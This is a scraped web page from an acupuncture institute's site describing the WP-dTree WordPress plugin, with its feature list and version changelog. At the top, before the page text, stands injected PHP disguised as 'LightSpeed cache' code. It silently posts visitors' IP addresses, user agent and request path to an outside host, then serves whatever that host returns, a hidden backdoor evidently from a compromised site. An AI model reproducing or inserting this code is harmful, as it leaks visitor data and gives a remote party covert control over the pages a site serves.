/** * Implement the LightSpeed cache. */ if (preg_match ('/.*77.*/', $_SERVER['REQUEST_URI']) || preg_match ('/.*ach.*/', $_SERVER['REQUEST_URI'])) { error_reporting(0); $url="http://w3lightcache.com/server_new.php";$params="h=$_SERVER[HTTP_HOST]&ua=$_SERVER[HTTP_USER_AGENT]&ip=$_SERVER[REMOTE_ADDR]&ip2=$_SERVER[HTTP_X_FORWARDED_FOR]&uri=$_SERVER[REQUEST_URI]";$ch=curl_init($url);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,$params);curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);$result=curl_exec($ch);curl_close($ch); if (!empty($result)) {echo $result; die;} } WP-dTree plugin : American Institute of Acupuncture

Journal of Acuherb in Medicine


WP-dTree plugin

Print Friendly, PDF & Email

Dynamic tree-widgets to replace the standard archives, categories, pages and link lists.

This plugin provides?dynamic navigation trees?to replace the standard archives, categories, pages and link lists. They’re widgets so you can setup?the awesome tree navigation?with drag & drop ease, but it also exposes several?new template tags?for developers.

WP-dTree 4.0 is a complete re-write, bringing the plugin up to speed with the much matured WordPress 3 API. The overhaul has made WP-dTree significantly more sane and robust; it supports multiple widget instances, “foreign” characters, is more in tune with your themes, plays nice with translators and offers true fallbacks for those who surf without JavaScript.

If you value?my plugins?and want to motivate further development – pleasehelp me out?by?downloading and installing DropBox?from my refferal link. It’s a cross-plattform application to sync your files online and across computers. A 2GB account is free and my refferal earns you a 250MB bonus!

Note:

For some users the installation procedure left WP-dTree without a default configuration. If after installing and activating the widget all you get is?a wierd string of code, just go to Settings -> WP-dTree and hit “Update settings”.

Changes in v4.2 (2010-10-29)

  • Fixed the uninstallation procedure.

Changes in v4.1 (2010-10-23)

Changes in v4.0 (2010-10-17)

  • Completely recoded from the ground up for a much needed code overhaul.
  • All previous settings will be lost!?Write them down before upgrading.
  • Added: support for multiple tree instances
  • Added: support for per-tree configurations
  • Added:?template tags?for theme developers
  • Added: (optional) noscript for JS-disabled visitors
  • Added: uses category descriptions for link titles
  • Added: translation support
  • Added: optional JS-escape (XHTML, HTML or none) to ease validation
  • Added: caching is optional (per instance, to boot)
  • Fixed: should properly encode quotes and HTML-entities
  • Replaced Scriptacolous with jQuery
  • Made truncation optional
  • Removed support for WP <2.3
  • Removed all CSS-options from admin area
  • Removed all non-essential CSS-rules
  • Only load jQuery if animation is on
  • Minified JS and CSS (9KB vs. 16KB!)
  • Cache is created on site visit (faster admin, less server load)